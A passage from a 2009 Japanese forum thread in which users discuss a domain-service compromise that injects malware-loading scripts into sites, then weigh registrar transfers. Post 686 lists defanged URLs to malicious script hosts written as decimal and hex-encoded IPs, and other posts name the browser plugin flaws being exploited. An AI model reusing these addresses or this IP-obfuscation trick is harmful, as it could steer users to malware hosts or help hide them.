0] >>572 忍者ツールズにも通報する！ >>635 HTMLソースを解析して表示するだけだから安全です。 1856317799:888 このアドレスをnslookupするとhome.ne.jp内のIPじゃね？ 今回の一件でVDには個人的にに失望した。 お前ら、どこに移管する？ 683 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:41:40 0] 移管は止めんが移管先に関する話題は専スレで 684 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:42:17 0] >>660 もうちょっと詳しく！！ 685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:42:52 0] >>682 リンク貼るなよ 686 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:44:27 0] URLStatusContent Type  tp://ax.xrea.com/login.php  200  text/html   tp://1856317799:888/jp.js  200  text/javascript   about:blank  200  text/html   tp://0x6EA52967:888/dir2/show.php  200  text/html   tp://0x6EA52967:888/dir2/go.jpg  200  text/javascript   tp://1856317799:888/counter.htm  200  text/html   p://ct2.shinobi.jp/sc/1298877  200  text/javascript   p://ct2.shinobi.jp/sd/1298877  200  text/javascript  なにこれ・・・・ 687 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:44:41 0] To: 682 Norton Safe Web ttp://safeweb.norton.com/report/show?name=110.165.41.103 Webサイトの場所 香港 688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:46:47 0] だから全角でと何度も… 689 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:48:11 0] inetnum: 110.165.32.0 - 110.165.63.255 netname: FKT-HK descr: Flat/Rm D Block 1, 8/F country: HK role: FEIKE TECH LIMITED - network administrator address: FLAT/RM D BLK1 8/F 162-170 TAI LIN PAI RD KWAI CHUNG NT HK country: HK phone: +852 82050331 e-mail: on@feikecom.com admin-c: FTLn1-AP tech-c: FTLn1-AP nic-hdl: FTLn1-AP mnt-by: MAINT-FKT-HK changed: hm-changed@apnic.net 20090408 source: APNIC changed: hm-changed@apnic.net 20090408 690 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:49:10 0] >>683　専スレを示せよ 691 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:49:30 0] 「ttp://〜」にしても、専用ブラウザだとリンクするし、 全角にするのが一番無難ですね。 692 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:51:53 0] >>690 もうそのパターンはしつこいって。 一応レスしとくから勝手に探して勝手にやってね。 693 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:51:58 0] >>690 >>683じゃないけど もの凄い勢いで誰かが有料ﾚﾝﾀﾙｻｰﾊﾞｰを探すスレ 13 pc11.2ch.net/test/read.cgi/hosting/1229551534/ あたりじゃね？ 694 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:58:30 0] とりあえずはVDをヲチするしかないの？ 誰かお茶持ってきてｰ 695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:59:08 0] さくらはどうでしょう 他社で取得した独自ドメインを利用する support.sakura.ad.jp/support/manual/rs/setdom_c.shtml 696 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:59:31 0] 乗り換え先の話題はこっちで お前らお勧めのレジストラ教えてください pc11.2ch.net/test/read.cgi/hosting/1010742997/ 697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:01:01 0] >>694 ∧＿∧ ( ´･ω･) みなさん、お茶が入りましたよ・・・・。 ( つ旦O と＿)＿) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦 698 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:02:18 0] Keysysドメインを2個所有している自分には隙が無かった… 699 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:07:34 0] >>698　何の隙? 700 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:10:18 0] >>690 まず次のところを見る： www.domainname.ne.jp/ リンククラブは除外するのが無難： www24.atwiki.jp/linkclub/ あとは696の紹介されたスレッドで聞くのが適当だと思う： お前らお勧めのレジストラ教えてください pc11.2ch.net/test/read.cgi/hosting/1010742997/l50 701 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:16:04 0] お茶あちーよ！ 麦茶にしてくれ！ 702 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:19:49 0] そうそう、msvidctl.dllの脆弱性は確かにActiveXコントロールだからIEだけだけど 同時にFlashPlayerとAdobeReader(Acrobat)の脆弱性も使います。 この2つは最新バージョンにしていなければNetscapeプラグイン系 (Firefox、Opera、Safari、etc.)もやられるのであしからず。 703 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:27:40 0] >>648 ttp://lineage.paix.jp/guide/security/virus-site.html ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090706_DirectShow 704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:28:48 0] お名前.comが移管380円のキャンペーンやってるから乗っかってみようかな 705 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:38:57 0] うちはccTLDなので心中するしかなさそうです/ ,' 3　 `ヽｰっ 706 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:42:05 0] >>692　お前はほんとに役に立たない奴だなｗ 707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:44:05 0] しかしウイルス置いてあるサイトのアクセス数がすごい勢いで増えてるな 708 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 20:48:08 0] サイトジャックが済んでも、ゼロデイ攻撃のためにとりあえずそのまま放置しておくんだろうね。 709 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 21:11:42 0] 闇市場でアカウント情報を売買してるって言うしな 710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 21:21:39 0] >>704 また随分いいタイミングでのキャンペーンだなぁ。いつのまにか独自DNS使えるようになってるし。 ・・・まさか・・・まさかな・・・。 711 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 21:22:22 0] >>708 ゼロデイ攻撃の意味わかってるか？ 712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 21:23:10 0] >>711 だからゼロデイ攻撃を起こすときに乗っ取ったサイトをいっぺんに書き換えるでしょ 713 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 21:33:41 0] 頭の悪い会話は他所でやってくれよ 後から来た人がこの騒ぎを冗談と思ったらどうするんだ

---

---

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef